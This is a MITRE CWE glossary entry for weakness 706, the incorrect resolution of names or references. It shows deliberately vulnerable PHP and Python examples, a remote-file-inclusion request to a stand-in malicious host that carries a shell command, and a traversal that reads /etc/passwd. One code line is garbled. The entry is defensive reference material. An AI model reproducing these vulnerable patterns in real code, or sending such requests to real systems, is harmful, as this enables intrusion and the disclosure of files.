Use of Incorrectly-Resolved Name or Reference (4.20) (original) (raw)
| CWE Glossary Definition |  |
|---|---|
Weakness ID: 706
Vulnerability Mapping: ALLOWED This CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review (with careful review of mapping notes)
Abstraction:Class Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource.
Description
The product uses a name or reference to access a resource, but the name/reference resolves to a resource that is outside of the intended control sphere.
Common Consequences
This table specifies different individual consequences associated with the weakness. The Scope identifies the application security area that is violated, while the Impact describes the negative technical impact that arises if an adversary succeeds in exploiting this weakness. The Likelihood provides information about how likely the specific consequence is expected to be seen relative to the other consequences in the list. For example, there may be high likelihood that a weakness will be exploited to achieve a certain impact, but a low likelihood that it will be exploited to achieve a different impact.
| Impact | Details |
|---|---|
| Read Application Data; Modify Application Data | Scope: Confidentiality, Integrity |
Relationships
This table shows the weaknesses and high level categories that are related to this weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user may want to explore.
Relevant to the view "Research Concepts" (View-1000)
| Nature | Type | ID | Name |
|---|---|---|---|
| ChildOf |  Pillar - a weakness that is the most abstract type of weakness and represents a theme for all class/base/variant weaknesses related to it. A Pillar is different from a Category as a Pillar is still technically a type of weakness that describes a mistake, while a Category represents a common characteristic used to group related things. |
664 | Improper Control of a Resource Through its Lifetime |
| ParentOf |  Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
22 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
41 | Improper Resolution of Path Equivalence |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
59 | Improper Link Resolution Before File Access ('Link Following') |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
66 | Improper Handling of File Names that Identify Virtual Resources |
| ParentOf |  Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource. |
98 | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
178 | Improper Handling of Case Sensitivity |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
386 | Symbolic Name not Mapping to Correct Object |
| ParentOf | Variant - a weakness that is linked to a certain type of product, typically involving a specific language or technology. More specific than a Base weakness. Variant level weaknesses typically describe issues in terms of 3 to 5 of the following dimensions: behavior, property, technology, language, and resource. |
827 | Improper Control of Document Type Definition |
| PeerOf |  Class - a weakness that is described in a very abstract fashion, typically independent of any specific language or technology. More specific than a Pillar Weakness, but more general than a Base Weakness. Class level weaknesses typically describe issues in terms of 1 or 2 of the following dimensions: behavior, property, and resource. |
99 | Improper Control of Resource Identifiers ('Resource Injection') |
Relevant to the view "Weaknesses for Simplified Mapping of Published Vulnerabilities" (View-1003)
| Nature | Type | ID | Name |
|---|---|---|---|
| MemberOf |  View - a subset of CWE entries that provides a way of examining CWE content. The two main view structures are Slices (flat lists) and Graphs (containing relationships between entries). |
1003 | Weaknesses for Simplified Mapping of Published Vulnerabilities |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
22 | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
59 | Improper Link Resolution Before File Access ('Link Following') |
| ParentOf | Base - a weakness that is still mostly independent of a resource or technology, but with sufficient details to provide specific methods for detection and prevention. Base level weaknesses typically describe issues in terms of 2 or 3 of the following dimensions: behavior, property, technology, language, and resource. |
178 | Improper Handling of Case Sensitivity |
Modes Of Introduction
The different Modes of Introduction provide information about how and when this weakness may be introduced. The Phase identifies a point in the life cycle at which introduction may occur, while the Note provides a typical scenario related to introduction during the given phase.
| Phase | Note |
|---|---|
| Architecture and Design | |
| Implementation |
Applicable Platforms
This listing shows possible areas for which the given weakness could appear. These may be for specific named Languages, Operating Systems, Architectures, Paradigms, Technologies, or a class of such platforms. The platform is listed along with how frequently the given weakness appears for that instance.
| Languages | Class: Not Language-Specific(Undetermined Prevalence) |
|---|---|
| Technologies | Class: Not Technology-Specific(Undetermined Prevalence) |
Demonstrative Examples
Example 1
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
(bad code)
Example Language: PHP
dir=dir = dir=_GET['module_name'];
include($dir . "/function.php");
The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a 'module_name' of "http://malicious.example.com" by using the following request string:
victim.php?module_name=http://malicious.example.com
Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.
For the sake of this example, assume that the malicious version of function.php looks like the following:
(bad code)
Example Language: PHP
An attacker could now go a step further in our example and provide a request string as follows:
victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l
The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case:
Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations.
Example 2
This script intends to read a user-supplied file from the current directory. The user inputs the relative path to the file and the script uses Python's os.path.join() function to combine the path to the current working directory with the provided path to the specified file. This results in an absolute path to the desired file. If the file does not exist when the script attempts to read it, an error is printed to the user.
(bad code)
Example Language: Python
import os
import sys
def main():
filename = sys.argv[1]
path = os.path.join(os.getcwd(), filename)
try:
with open(path, 'r') as f:
file_data = f.read()
except FileNotFoundError as e:
print("Error - file not found")
main()
However, if the user supplies an absolute path, the os.path.join() function will discard the path to the current working directory and use only the absolute path provided. For example, if the current working directory is /home/user/documents, but the user inputs /etc/passwd, os.path.join() will use only /etc/passwd, as it is considered an absolute path. In the above scenario, this would cause the script to access and read the /etc/passwd file.
(good code)
Example Language: Python
import os
import sys
def main():
filename = sys.argv[1]
path = os.path.normpath(f"{os.getcwd()}{os.sep}{filename}")
if path.startswith("/home/cwe/documents/"):
try:
with open(path, 'r') as f:
file_data = f.read()
except FileNotFoundError as e:
print("Error - file not found")
main()
The constructed path string uses os.sep to add the appropriate separation character for the given operating system (e.g. '\' or '/') and the call to os.path.normpath() removes any additional slashes that may have been entered - this may occur particularly when using a Windows path. The path is checked against an expected directory (/home/cwe/documents); otherwise, an attacker could provide relative path sequences like ".." to cause normpath() to generate paths that are outside the intended directory (CWE-23). By putting the pieces of the path string together in this fashion, the script avoids a call to os.path.join() and any potential issues that might arise if an absolute path is entered. With this version of the script, if the current working directory is /home/cwe/documents, and the user inputs /etc/passwd, the resulting path will be /home/cwe/documents/etc/passwd. The user is therefore contained within the current working directory as intended.
Weakness Ordinalities
| Ordinality | Description |
|---|---|
| Primary | (where the weakness exists independent of other weaknesses) |
Detection Methods
| Method | Details |
|---|---|
| Automated Static Analysis | Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) |
Memberships
This MemberOf Relationships table shows additional CWE Categories and Views that reference this weakness as a member. This information is often useful in understanding where a weakness fits within the context of external information sources.
Vulnerability Mapping Notes
| Usage | ALLOWED-WITH-REVIEW (this CWE ID could be used to map to real-world vulnerabilities in limited situations requiring careful review) |
|---|---|
| Reason | Abstraction |
| Rationale | This CWE entry is a Class and might have Base-level children that would be more appropriate |
| Comments | Examine children of this entry to see if there is a better fit |
Content History
| Submissions |
||
|---|---|---|
| Submission Date | Submitter | Organization |
| 2008-09-09(CWE 1.0, 2008-09-09) | CWE Content Team | MITRE |
| Note: this date reflects when the entry was first published. Draft versions of this entry were provided to members of the CWE community and modified between Draft 9 and 1.0. | ||
 Modifications |
||
| Modification Date | Modifier | Organization |
| 2025-12-11(CWE 4.19, 2025-12-11) | CWE Content Team | MITRE |
| updated Applicable_Platforms, Demonstrative_Examples, Detection_Factors, Weakness_Ordinalities | ||
| 2023-06-29(CWE 4.12, 2023-06-29) | CWE Content Team | MITRE |
| updated Mapping_Notes | ||
| 2023-04-27(CWE 4.11, 2023-04-27) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2023-01-31(CWE 4.10, 2023-01-31) | CWE Content Team | MITRE |
| updated Description | ||
| 2021-10-28(CWE 4.6, 2021-10-28) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2020-02-24(CWE 4.0, 2020-02-24) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2019-06-20(CWE 3.3, 2019-06-20) | CWE Content Team | MITRE |
| updated Related_Attack_Patterns, Relationships | ||
| 2019-01-03(CWE 3.2, 2019-01-03) | CWE Content Team | MITRE |
| updated Related_Attack_Patterns | ||
| 2018-03-27(CWE 3.1, 2018-03-27) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2017-11-08(CWE 3.0, 2017-11-08) | CWE Content Team | MITRE |
| updated Applicable_Platforms | ||
| 2017-01-19(CWE 2.10, 2017-01-19) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2014-07-30(CWE 2.8, 2014-07-31) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2012-05-11(CWE 2.2, 2012-05-15) | CWE Content Team | MITRE |
| updated Related_Attack_Patterns, Relationships | ||
| 2011-06-01(CWE 1.13, 2011-06-01) | CWE Content Team | MITRE |
| updated Common_Consequences | ||
| 2011-03-29(CWE 1.12, 2011-03-30) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2010-12-13(CWE 1.11, 2010-12-13) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2010-02-16(CWE 1.8, 2010-02-16) | CWE Content Team | MITRE |
| updated Relationships | ||
| 2009-03-10(CWE 1.3, 2009-03-10) | CWE Content Team | MITRE |
| updated Related_Attack_Patterns | ||
| 2008-07-01(CWE 1.0, 2008-09-09) | Eric Dalci | Cigital |
| updated Time_of_Introduction |
More information is available — Please edit the custom filter or select a different filter.